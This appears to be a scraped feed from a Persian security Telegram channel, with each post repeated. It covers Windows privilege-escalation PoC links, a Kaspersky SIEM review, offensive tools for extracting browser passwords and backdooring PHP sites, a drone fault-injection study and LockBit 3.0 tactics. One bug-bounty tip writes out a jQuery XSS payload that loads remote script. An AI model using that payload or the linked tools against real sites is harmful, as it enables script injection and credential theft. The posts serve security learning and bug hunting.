🕷CVE-2023-29336 : Win32k - Privilege Escalation
POC : https://github.com/m-cetin/CVE-2023-29336
POC : https://github.com/numencyber/Vulnerability_PoC/blob/main/CVE-2023-29336/poc.cpp
Analysis : https://www.numencyber.com/cve-2023-29336-win32k-analysis/
@Engineer_Computer
POC : https://github.com/m-cetin/CVE-2023-29336
POC : https://github.com/numencyber/Vulnerability_PoC/blob/main/CVE-2023-29336/poc.cpp
Analysis : https://www.numencyber.com/cve-2023-29336-win32k-analysis/
@Engineer_Computer
Kaspersky Unified Monitoring and Analysis Platform
کسپرسکی بالاخره محصول SIEM خودش رو در سبد فروش جهانی قرار داد و این محصول به زودی وارد بازار ایران میشه. این محصول که به KUMA معروفه در کنار قابلیت های خیره کننده ای که داره نکات کلیدی ای هم داره که فکر می کنم می تونه خودش رو به عنوان یکی از پرچم داران این حوزه معرفی کنه.
@Engineer_Computer
کسپرسکی بالاخره محصول SIEM خودش رو در سبد فروش جهانی قرار داد و این محصول به زودی وارد بازار ایران میشه. این محصول که به KUMA معروفه در کنار قابلیت های خیره کننده ای که داره نکات کلیدی ای هم داره که فکر می کنم می تونه خودش رو به عنوان یکی از پرچم داران این حوزه معرفی کنه.
@Engineer_Computer
Network Security Channel
Kaspersky Unified Monitoring and Analysis Platform کسپرسکی بالاخره محصول SIEM خودش رو در سبد فروش جهانی قرار داد و این محصول به زودی وارد بازار ایران میشه. این محصول که به KUMA معروفه در کنار قابلیت های خیره کننده ای که داره نکات کلیدی ای هم داره که فکر…
برخي از ويژگي هاي اين محصول:
اول EPS محصول هست که می تونه تا 300K ورودی به ازای هر نود Correlation داشته باشه. این رو مقایسه کنید مثلا با ArcSight که حداکثر از 100K EPS پشتیبانی می کنه. نکته جالب دیگه اینه که می تونیم محصول رو در حالت Distribution پیاده کنیم و در واقع قابلیت LB رو داشته باشیم.
نکته بعدی معماری سیستم هست که به صورت میکرو سرویس طراحی شده و این علاوه بر مصرف منابع فوق العاده پایین، باعث شده دست ما در مقیاس پذیری و توسعه زیرساخت باز باشه. و البته که از HA و Fault Tolerance هم پشتیبانی می کنه.
نکته مهم دیگه Integration محصول با ابزارهای دیگه هست. این یکپارچه سازی رو میشه به دو قسمت تقسیم کرد: محصولات کسپرسکی و محصولات Third Party. برای محصولات Third Party مثل محصولات دیگه دست ما درKUMA هم باز هست و طیف وسیعی از ابزارها رو پشتیبانی می کنه. نکته جالب اینه که برای Parser نویسی هم خودمون می تونیم به راحتی داخلش Parser رو ایجاد کنیم و هم به لطف پشتیبانی مستقیم کسپرسکی در ایران، نوشتن Parser رو از خود شرکت درخواست کنیم. اما در مورد محصولات کسپرسکی داستان متفاوته. در اینجا میتونیم مفهوم یکپارچه سازی به معنای واقعی رو ببینیم، مثلا اتصال EPP کسپرسکی به KUMA یعنی می تونیم ازش به عنوان Inventory, Asset Management, Vulnerability Assessment و غیره استفاده کنیم. این محصول با بیشتر محصولات کسپرسکی ادغام می شه که من تصویرش رو گذاشتم. اما قابلیت های افزوده به قدری زیاده که نمیشه در این مقاله همه رو پوشش داد.
این محصول توسط کسپرسکی نوشته شده. پس یعنی میتونه به Threat Intelligence کسپرسکی متصل بشه و در برابر رقبا یک برگ برنده قوی داشته باشه. و استفاده از TDF کسپرسکی یعنی قدرت شناسایی تهدیدات فوق العاده بالا. نکته کلیدی این محصول قابلیت response هست که فعلا در حد محصولات کسپرسکیه اما در نسخه های آینده قراره این قابلیت رو برای ابزارهای Third Party دیگه مثل فایروال هم پیاده سازی کنه
کسپرسکی با ارائه این محصول قصد داره معنای XDR رو تغییر بده و البته که با وجود این محصول در قلب XDR خودش، عملا یک SOC کامل رو می تونه پیاده سازی کنه.
#Kaspersky
#XDR
#Threatintelligence
#KUMA
@Engineer_Computer
اول EPS محصول هست که می تونه تا 300K ورودی به ازای هر نود Correlation داشته باشه. این رو مقایسه کنید مثلا با ArcSight که حداکثر از 100K EPS پشتیبانی می کنه. نکته جالب دیگه اینه که می تونیم محصول رو در حالت Distribution پیاده کنیم و در واقع قابلیت LB رو داشته باشیم.
نکته بعدی معماری سیستم هست که به صورت میکرو سرویس طراحی شده و این علاوه بر مصرف منابع فوق العاده پایین، باعث شده دست ما در مقیاس پذیری و توسعه زیرساخت باز باشه. و البته که از HA و Fault Tolerance هم پشتیبانی می کنه.
نکته مهم دیگه Integration محصول با ابزارهای دیگه هست. این یکپارچه سازی رو میشه به دو قسمت تقسیم کرد: محصولات کسپرسکی و محصولات Third Party. برای محصولات Third Party مثل محصولات دیگه دست ما درKUMA هم باز هست و طیف وسیعی از ابزارها رو پشتیبانی می کنه. نکته جالب اینه که برای Parser نویسی هم خودمون می تونیم به راحتی داخلش Parser رو ایجاد کنیم و هم به لطف پشتیبانی مستقیم کسپرسکی در ایران، نوشتن Parser رو از خود شرکت درخواست کنیم. اما در مورد محصولات کسپرسکی داستان متفاوته. در اینجا میتونیم مفهوم یکپارچه سازی به معنای واقعی رو ببینیم، مثلا اتصال EPP کسپرسکی به KUMA یعنی می تونیم ازش به عنوان Inventory, Asset Management, Vulnerability Assessment و غیره استفاده کنیم. این محصول با بیشتر محصولات کسپرسکی ادغام می شه که من تصویرش رو گذاشتم. اما قابلیت های افزوده به قدری زیاده که نمیشه در این مقاله همه رو پوشش داد.
این محصول توسط کسپرسکی نوشته شده. پس یعنی میتونه به Threat Intelligence کسپرسکی متصل بشه و در برابر رقبا یک برگ برنده قوی داشته باشه. و استفاده از TDF کسپرسکی یعنی قدرت شناسایی تهدیدات فوق العاده بالا. نکته کلیدی این محصول قابلیت response هست که فعلا در حد محصولات کسپرسکیه اما در نسخه های آینده قراره این قابلیت رو برای ابزارهای Third Party دیگه مثل فایروال هم پیاده سازی کنه
کسپرسکی با ارائه این محصول قصد داره معنای XDR رو تغییر بده و البته که با وجود این محصول در قلب XDR خودش، عملا یک SOC کامل رو می تونه پیاده سازی کنه.
#Kaspersky
#XDR
#Threatintelligence
#KUMA
@Engineer_Computer
cryptography
Eurocrypt 2023: Death of a KEM
https://research.nccgroup.com/2023/06/01/eurocrypt-2023-death-of-a-kem
@Engineer_Computer
Eurocrypt 2023: Death of a KEM
https://research.nccgroup.com/2023/06/01/eurocrypt-2023-death-of-a-kem
@Engineer_Computer
Nccgroup
Cyber Security Research
Cutting-edge cyber security research from NCC Group. Find public reports, technical advisories, analyses, & other novel insights from our global experts.
tools
Offensive security
1. HackBrowserData - CLI tool for decrypting/exporting browser data (passwords, history, cookies, bookmarks, credit cards, download records, localStorage and extension) from the browser
https://github.com/moonD4rk/HackBrowserData
2. Hiphp - Open source project for create a BackDoor to control PHP-based sites
https://github.com/yasserbdj96/hiphp
@Engineer_Computer
Offensive security
1. HackBrowserData - CLI tool for decrypting/exporting browser data (passwords, history, cookies, bookmarks, credit cards, download records, localStorage and extension) from the browser
https://github.com/moonD4rk/HackBrowserData
2. Hiphp - Open source project for create a BackDoor to control PHP-based sites
https://github.com/yasserbdj96/hiphp
@Engineer_Computer
GitHub
GitHub - moonD4rk/HackBrowserData: Extract and decrypt browser data, supporting multiple data types, runnable on various operating…
Extract and decrypt browser data, supporting multiple data types, runnable on various operating systems (macOS, Windows, Linux). - moonD4rk/HackBrowserData
The Red Team Playground is a #Dockerized vulnerable testing lab for learning and practicing #RedTeam concepts.
Docker network containing many vulnerable targets for practicing Red Teaming concepts (initial access, priv esc, persistence, lateral, C2, evasion, etc).
https://github.com/minispooner/red-team-playground
@Engineer_Computer
Docker network containing many vulnerable targets for practicing Red Teaming concepts (initial access, priv esc, persistence, lateral, C2, evasion, etc).
https://github.com/minispooner/red-team-playground
@Engineer_Computer
GitHub
GitHub - minispooner/red-team-playground: Docker network containing many vulnerable targets for practicing Red Teaming concepts…
Docker network containing many vulnerable targets for practicing Red Teaming concepts (initial access, priv esc, persistence, lateral, C2, evasion, etc). - minispooner/red-team-playground
Privacy: Apple 🍎 Updates AirTags After Stalking Fears.
https://packetstormsecurity.com/news/view/32353/Apple-Updates-AirTags-After-Stalking-Fears.html
Proof of Concept Code for CVE-2023-32353: Local privilege escalation via iTunes in Windows.
https://github.com/86x/CVE-2023-32353-PoC
@Engineer_Computer
https://packetstormsecurity.com/news/view/32353/Apple-Updates-AirTags-After-Stalking-Fears.html
Proof of Concept Code for CVE-2023-32353: Local privilege escalation via iTunes in Windows.
https://github.com/86x/CVE-2023-32353-PoC
@Engineer_Computer
BBC News
Apple updates AirTags after stalking fears
Critics say the miniature trackers could be used to secretly monitor people's location.
Bug Bounty Hint
Is your JS payload limited to only 44 symbols?
Check if the website uses jQuery. This could help you execute your external JS, increasing your impact by providing an extended PoC.
$('<script src=//dom.xss>').appendTo('body')
@Engineer_Computer
Is your JS payload limited to only 44 symbols?
Check if the website uses jQuery. This could help you execute your external JS, increasing your impact by providing an extended PoC.
$('<script src=//dom.xss>').appendTo('body')
@Engineer_Computer
CVE-2023-23924: Dompdf up to 2.0.1 on PHP7 SVG Parser deserialization restoring in RCE.
To exploit CVE-2023-23924. An SVG contacting image tag with capitalized letters is sufficient.
@Engineer_Computer
To exploit CVE-2023-23924. An SVG contacting image tag with capitalized letters is sufficient.
@Engineer_Computer
Bug Bounty Tip
Don't forget to search for traits of 'post message' event handlers in all JS sources by using the built-in search functionality in your browser.
Search:
window.addEventListener("message"
Inspect those events for potential XSS
@Engineer_Computer
Don't forget to search for traits of 'post message' event handlers in all JS sources by using the built-in search functionality in your browser.
Search:
window.addEventListener("message"
Inspect those events for potential XSS
@Engineer_Computer
Drone Security and Fault _ IOactive.pdf
1.6 MB
🔴 Drone Security and Fault Injection Attacks
🔴 هک پهپاد با تکنیک EMFI
محققای IOActive ، یه تحقیقی روی پهپادها انجام دادن و متوجه شدن که اغلبشون پتاسیل هک در برابر حملات EMFI رو دارن.
https://act-on.ioactive.com/acton/attachment/34793/f-b1aa96d0-bd78-4518-bae3-2889aae340de/1/-/-/-/-/DroneSec-GGonzalez.pdf
https://www.securityweek.com/new-research-shows-potential-of-electromagnetic-fault-injection-attacks-against-drones/
@Engineer_Computer
🔴 هک پهپاد با تکنیک EMFI
محققای IOActive ، یه تحقیقی روی پهپادها انجام دادن و متوجه شدن که اغلبشون پتاسیل هک در برابر حملات EMFI رو دارن.
https://act-on.ioactive.com/acton/attachment/34793/f-b1aa96d0-bd78-4518-bae3-2889aae340de/1/-/-/-/-/DroneSec-GGonzalez.pdf
https://www.securityweek.com/new-research-shows-potential-of-electromagnetic-fault-injection-attacks-against-drones/
@Engineer_Computer
#استخدام
بانک تجارت و شرکتهای تابعهش تو زمینه های زیر با سطح تخصص کارشناس / مدیر پروژه نیرو میگیره:
1. NOC/ پایش
2. SOC / CSIRT
علاقمندان رزومهشون رو به ایمیل زیر ارسال کنند:
[email protected]
@Engineer_Computer
بانک تجارت و شرکتهای تابعهش تو زمینه های زیر با سطح تخصص کارشناس / مدیر پروژه نیرو میگیره:
1. NOC/ پایش
2. SOC / CSIRT
علاقمندان رزومهشون رو به ایمیل زیر ارسال کنند:
[email protected]
@Engineer_Computer
#Ransomware #LockBit 3.0
باج افزار LockBit تا کنون مبلغی بیش از 100 میلیون دلار توانسته باج گیری رایانه ای کنه که عموما از ارگان های دولتی آمریکا، چین، هند، فرانسه، آلمان، اوکراین و اندونزی رو درگیر کرده و جالب است که با سرور هایی که زبان های روسی، رومانی، عربی سوری تنظیم داشتند، کاری نداشته است.
اما رفتار های شاخص تکنیکی تاکتیکی این باج افزار چی مواردی است؟ نسخه 3 این باج افزار برای ایجاد دسترسی از تکنیک های Bruteforce پروتکل RDP ، تکنیک Drive-By Compromise و Spear Phishing و دسترسی به حساب های کاربری صحیح و همچنین بهره برداری از یک آسیب پذیری سرویس های fortinet بوده است.
اما برای Exfiltration عموما از وبسرویس های اشتراک گذاری فایل استفاده شده که فایل های مورد نیاز باج افزار رو به سیستم قربانی انتقال خواهد داد.
استفاده از Autostart Execution ها برای ارتقاء سطح دسترسی که معمولا با schtasks انجام میشه، استفاده از Obfuscation کد برای نامحسوس سازی PE باج افزار، خاموش کردن سرویس های امنیتی سیستم عامل، گرفتن Dump از LSASS بر بستر حافظه و مواردی دیگر، اطلاعات تکمیلی در این مقاله است.
@Engineer_Computer
باج افزار LockBit تا کنون مبلغی بیش از 100 میلیون دلار توانسته باج گیری رایانه ای کنه که عموما از ارگان های دولتی آمریکا، چین، هند، فرانسه، آلمان، اوکراین و اندونزی رو درگیر کرده و جالب است که با سرور هایی که زبان های روسی، رومانی، عربی سوری تنظیم داشتند، کاری نداشته است.
اما رفتار های شاخص تکنیکی تاکتیکی این باج افزار چی مواردی است؟ نسخه 3 این باج افزار برای ایجاد دسترسی از تکنیک های Bruteforce پروتکل RDP ، تکنیک Drive-By Compromise و Spear Phishing و دسترسی به حساب های کاربری صحیح و همچنین بهره برداری از یک آسیب پذیری سرویس های fortinet بوده است.
اما برای Exfiltration عموما از وبسرویس های اشتراک گذاری فایل استفاده شده که فایل های مورد نیاز باج افزار رو به سیستم قربانی انتقال خواهد داد.
استفاده از Autostart Execution ها برای ارتقاء سطح دسترسی که معمولا با schtasks انجام میشه، استفاده از Obfuscation کد برای نامحسوس سازی PE باج افزار، خاموش کردن سرویس های امنیتی سیستم عامل، گرفتن Dump از LSASS بر بستر حافظه و مواردی دیگر، اطلاعات تکمیلی در این مقاله است.
@Engineer_Computer